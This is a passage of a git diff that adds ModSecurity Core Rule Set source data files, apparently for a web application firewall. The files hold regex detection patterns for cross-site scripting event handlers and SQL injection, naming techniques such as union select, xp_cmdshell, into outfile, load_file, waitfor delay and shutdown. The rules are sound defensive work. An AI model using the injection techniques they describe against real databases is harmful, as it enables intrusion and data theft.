+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?=
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data
new file mode 100644
index 000000000..83668cc94
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data
@@ -0,0 +1,21 @@
+\!\=
+\&\&
+\|\|
+>>
+<<
+>=
+<=
+<>
+<=>
+\bxor\b
+\bregexp\b
+regexp\s+binary
+\bisnull\b
+\brlike\b
+rlike\s+binary
+not\s+between\s+0\s+and
+is\s+null
+like\s+null
+^in[+\s]*\([\s\d\"]+[^()]*\)
+\Win[+\s]*\([\s\d\"]+[^()]*\)
+<>\s+binary
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data
new file mode 100644
index 000000000..432281104
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data
@@ -0,0 +1,16 @@
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b)
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+
+[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data
new file mode 100644
index 000000000..9ef24c987
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data
@@ -0,0 +1,25 @@
+database\W*\(
+db_name\W*\(
+information_schema\b
+master\.\.sysdatabases\b
+msdb\b
+msysaccessobjects\b
+msysaccessstorage\b
+msysaccessxml\b
+msysaces\b
+msysmodules2\b
+msysmodules\b
+msysobjects\b
+msysqueries\b
+msysrelationships\b
+mysql\.db\b
+northwind\b
+pg_catalog\b
+pg_toast\b
+schema_name\b
+schema\W*\(
+sqlite_master\b
+sqlite_temp_master\b
+sysaux\b
+sys\.database_name\b
+tempdb\b
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data
new file mode 100644
index 000000000..66f1ed820
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data
@@ -0,0 +1,236 @@
+abs
+acos
+adddate
+addtime
+aes_decrypt
+aes_encrypt
+ascii
+asciistr
+asin
+atan
+atan2
+avg
+benchmark
+bin
+bin_to_num
+bit_and
+bit_count
+bit_length
+bit_or
+bit_xor
+cast
+ciel
+cieling
+char_length
+char
+character_length
+charset
+chr
+coalesce
+coercibility
+collation
+compress
+concat_ws
+concat
+connection_id
+conv
+convert_tz
+convert
+cos
+cot
+count
+dcount
+cr32
+curdate
+current_date
+current_time
+current_timestamp
+current_user
+curtime
+database
+date
+date_add
+date_format
+date_sub
+datediff
+day
+dayname
+dayofmonth
+dayofweek
+dayofyear
+decode
+default
+degrees
+des_decrypt
+des_encrypt
+dump
+elt
+encode
+encrypt
+exp
+export_set
+extract
+extractvalue
+field
+field_in_set
+find_in_set
+floor
+format
+found_rows
+from_base64
+from_days
+from_unixtime
+get_format
+get_lock
+greatest
+group_concat
+hex
+hextoraw
+rawtohex
+hour
+if
+ifnull
+in
+inet6_aton
+inet6_ntoa
+inet_aton
+inet_ntoa
+insert
+instr
+interval
+isnull
+is_free_lock
+is_ipv4_compat
+is_ipv4_mapped
+is_ipv4
+is_ipv6
+is_not_null
+is_not
+is_null
+is_used_lock
+last
+last_day
+last_inser_id
+lcase
+least
+left
+length
+ln
+load_file
+local
+localtimestamp
+locate
+log
+log2
+log10
+lower
+lpad
+ltrim
+make_set
+makedate
+master_pos_wait
+max
+md5
+microsecond
+mid
+min
+minute
+mod
+month
+monthname
+name_const
+not_in
+now
+nullif
+oct
+octet_length
+old_password
+ord
+password
+period_add
+period_diff
+pi
+position
+pow
+power
+procedure_analyse
+quarter
+quote
+radians
+rand
+release_lock
+repeat
+replace
+reverse
+right
+round
+row_count
+rpad
+rtrim
+schema
+sec_to_time
+second
+session_user
+sha
+sha1
+sha2
+sign
+sin
+pg_sleep
+sleep
+soundex
+space
+sqrt
+std
+stddev_pop
+stddev_samp
+str_to_date
+strcmp
+subdate
+substring
+substring_index
+substr
+subtime
+sum
+sysdate
+system_user
+tan
+time
+timestamp
+timestampadd
+timestampdiff
+timediff
+time_format
+time_to_sec
+to_base64
+todays
+toseconds
+tochar
+tonchar
+trim
+truncate
+ucase
+uncompress
+uncompressed_length
+unhex
+unix_timestamp
+updatexml
+upper
+user
+utc_date
+utc_time
+utc_timestamp
+uuid
+uuid_short
+values
+var_pop
+var_samp
+variance
+version
+week
+weekday
+weekofyear
+weight_string
+year
+yearweek
+xmltype
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data
new file mode 100644
index 000000000..18d61e72b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data
@@ -0,0 +1,6 @@
+select\s+benchmark\s*?\(\s*?[(]?\s*?\w+
+;\s+benchmark\s*?\(\s*?[(]?\s*?\w+
+select\s+if\s*?\(\s*?[(]?\s*?\w+
+;\s+if\s*?\(\s*?[(]?\s*?\w+
+select\s+sleep\s*?\(\s*?[(]?\s*?\w+
+;\s+sleep\s*?\(\s*?[(]?\s*?\w+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data
new file mode 100644
index 000000000..8ab41df92
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data
@@ -0,0 +1,21 @@
+\d[\"'`]\s+[\"'`]\s+\d
+^admin\s*?[\"'`]
+(?:/\*)+[\"'`]+\s?
+(?:/\*)+[\"'`]+\s?--
+(?:/\*)+[\"'`]+\s?#
+(?:/\*)+[\"'`]+\s?/\*
+(?:/\*)+[\"'`]+\s?{
+[\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]
+[\"'`]\s*?[^\w\s]?=\s*?[\"'`]
+[\"'`]\W*?[+=]+\W*?[\"'`]
+[\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$
+[\"'`]\s*?[!=|][\d\s!=]+.*?\d+$
+[\"'`]\s*?like\W+[\w\"'`(]
+\sis\s*?0\W
+where\s[\s\w\.,-]+\s=
+[\"'`][<>~]+[\"'`]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data
new file mode 100644
index 000000000..3745cb110
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data
@@ -0,0 +1,20 @@
+[\"'`]\s*?!\s*?[\"'`\w]
+[\"'`];?\s*?having\b\s*?[^\s]
+[\"'`];?\s*?select\b\s*?[^\s]
+[\"'`];?\s*?union\b\s*?[^\s]
+\s*?exec.*?\Wxp_cmdshell
+\s*?execute.*?\Wxp_cmdshell
+\wiif\s*?\(
+connection_id\s*?\([^\)]*?
+current_user\s*?\([^\)]*?
+database\s*?\([^\)]*?
+exec\s+master\.
+execute\s+master\.
+from\W+information_schema\W
+into[\s+]+dumpfile\s*?[\"'`]
+into[\s+]+outfile\s*?[\"'`]
+schema\s*?\([^\)]*?
+select.*?\w?user\(
+union select @
+union[\w(\s]*?select
+user\s*?\([^\)]*?
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data
new file mode 100644
index 000000000..44eff5141
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data
@@ -0,0 +1,14 @@
+,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`]
+,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z
+,.*?[)\da-f\"'`][\"'`][^\"'`]+
+\Wselect.+\W*?from
+select\s*?\(\s*?space\s*?\(
+create\s*?\(\s*?space\s*?\(
+rename\s*?\(\s*?space\s*?\(
+truncate\s*?\(\s*?space\s*?\(
+load\s*?\(\s*?space\s*?\(
+alter\s*?\(\s*?space\s*?\(
+delete\s*?\(\s*?space\s*?\(
+update\s*?\(\s*?space\s*?\(
+insert\s*?\(\s*?space\s*?\(
+desc\s*?\(\s*?space\s*?\(
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data
new file mode 100644
index 000000000..1dd373cb8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942210.data
@@ -0,0 +1,40 @@
+@.+=\s*?\(\s*?select
+\d\s*?or\s*?\d+\s*?[\-+]
+\d\s*?xor\s*?\d+\s*?[\-+]
+\d\s*?div\s*?\d+\s*?[\-+]
+\d\s*?like\s*?\d+\s*?[\-+]
+\d\s*?between\s*?\d+\s*?[\-+]
+\d\s*?and\s*?\d+\s*?[\-+]
+\/\w+;?\s+having\W
+\/\w+;?\s+and\W
+\/\w+;?\s+or\W
+\/\w+;?\s+xor\W
+\/\w+;?\s+div\W
+\/\w+;?\s+like\W
+\/\w+;?\s+between\W
+\/\w+;?\s+select\W
+\d\s+group\s+by.+\(
+;\s*?drop
+#\s*?drop
+--\s*?drop
+;\s*?alter
+#\s*?alter
+--\s*?alter
+;\s*?update\s*?\w{2,}
+#\s*?update\s*?\w{2,}
+--\s*?update\s*?\w{2,}
+;\s*?insert\s*?\w{2,}
+#\s*?insert\s*?\w{2,}
+--\s*?insert\s*?\w{2,}
+[^\w]SET\s*?@\w+
+and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+\|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
+\&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data
new file mode 100644
index 000000000..48d070148
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942240.data
@@ -0,0 +1,5 @@
+alter\s*?\w+.*?character\s+set\s+\w+
+alter\s*?\w+.*?char\s+set\s+\w+
+[\"'`];*?\s*?waitfor\s+time\s+[\"'`]
+[\"'`];*?\s*?waitfor\s+delay\s+[\"'`]
+[\"'`];.*?:\s*?goto
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data
new file mode 100644
index 000000000..697ac400d
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942260.data
@@ -0,0 +1,22 @@
+union\s*?\s*?[([]*?\s*?select\s+
+union\s*?all\s*?[([]*?\s*?select\s+
+union\s*?distinct\s*?[([]*?\s*?select\s+
+union\s*?[(!@]*?\s*?[([]*?\s*?select\s+
+\w\s+like\s+[\"'`]
+like\s*?[\"'`]\%
+[\"'`]\s*?like\W*?[\"'`\d]
+[\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+
+[\"'`]\s*?\*\s*?\w+\W+[\"'`]
+[\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w
+select\s+?[\[\]()\s\w\.,\"'`-]+from\s+
+find_in_set\s*?\(
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data
new file mode 100644
index 000000000..5033a8200
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942280.data
@@ -0,0 +1,7 @@
+select\s*?pg_sleep
+waitfor\s*?delay\s?[\"'`]+\s?\d
+;\s*?shutdown\s*?;
+;\s*?shutdown\s*?--
+;\s*?shutdown\s*?#
+;\s*?shutdown\s*?\/\*
+;\s*?shutdown\s*?{
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data
new file mode 100644
index 000000000..d35b538c9
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942300.data
@@ -0,0 +1,18 @@
+\)\s*?when\s*?\d+\s*?then
+[\"'`]\s*?#
+[\"'`]\s*?--
+[\"'`]\s*?{
+\/\*!\s?\d+
+char\s*?\(\s*?\d
+chr\s*?\(\s*?\d
+and\s+\s*?\w+\(
+nand\s+\s*?\w+\(
+or\s+\s*?\w+\(
+xor\s+\s*?\w+\(
+xxor\s+\s*?\w+\(
+div\s+\s*?\w+\(
+like\s+\s*?\w+\(
+between\s+\s*?\w+\(
+not\s+\s*?\w+\(
+\|\|\s+\s*?\w+\(
+\&\&\s+\s*?\w+\(
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data
new file mode 100644
index 000000000..be535c05e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942310.data
@@ -0,0 +1,15 @@
+[\"'`]\s+and\s*?=\W
+\(\s*?select\s*?\w+\s*?\(
+\*\/from
+\+\s*?\d+\s*?\+\s*?@
+\w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(]
+\w[\"'`]\s*?[-+=|@]+[\d(]
+coalesce\s*?\(
+@@\w+\s*?[^\w\s]
+\W!+[\"'`]\w
+[\"'`];\s*?if
+[\"'`];\s*?while
+[\"'`];\s*?begin
+[\"'`][\s\d]+=\s*?\d
+order\s+by\s+if\w*?\s*?\(
+[\s(]+case\d*?\W.+[tw]hen[\s(]
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data
new file mode 100644
index 000000000..f0c6158c0
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942320.data
@@ -0,0 +1,7 @@
+create\s+function\s*?\w+\s*?\(\s*?\)\s*?-
+create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?-
+declare[^\w]+[@#]\s*?\w+
+exec\s*?\(\s*?@
+procedure\s+analyse\s*?\(
+;\s*?declare\s+[\w-]+
+;\s*?open\s+[\w-]+
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data
new file mode 100644
index 000000000..222ca2dd5
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942330.data
@@ -0,0 +1,46 @@
+[\"'`]\s*?or\s*?[\"'`]?\d
+[\"'`]\s*?xor\s*?[\"'`]?\d
+[\"'`]\s*?div\s*?[\"'`]?\d
+[\"'`]\s*?like\s*?[\"'`]?\d
+[\"'`]\s*?between\s*?[\"'`]?\d
+[\"'`]\s*?and\s*?[\"'`]?\d
+\\\\x(?:23|27|3d)
+^.?[\"'`]$
+^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-]
+^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-]
+[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w
+@\w+\s+and\s*?[\"'`\d]+
+@\w+\s+or\s*?[\"'`\d]+
+@\w+\s+xor\s*?[\"'`\d]+
+@\w+\s+div\s*?[\"'`\d]+
+@\w+\s+like\s*?[\"'`\d]+
+@\w+\s+between\s*?[\"'`\d]+
+@[\w-]+\sand\s*?[^\w\s]
+@[\w-]+\sor\s*?[^\w\s]
+@[\w-]+\sxor\s*?[^\w\s]
+@[\w-]+\sdiv\s*?[^\w\s]
+@[\w-]+\slike\s*?[^\w\s]
+@[\w-]+\sbetween\s*?[^\w\s]
+[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`].
+\Winformation_schema
+table_name\W
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data
new file mode 100644
index 000000000..0d9d9a6fb
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942340.data
@@ -0,0 +1,17 @@
+in\s*?[(]+\s*?select
+(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\(
+(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`]
+(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x
+[\"'`]\s*?\d\s*?--
+[\"'`]\s*?\d\s*?#
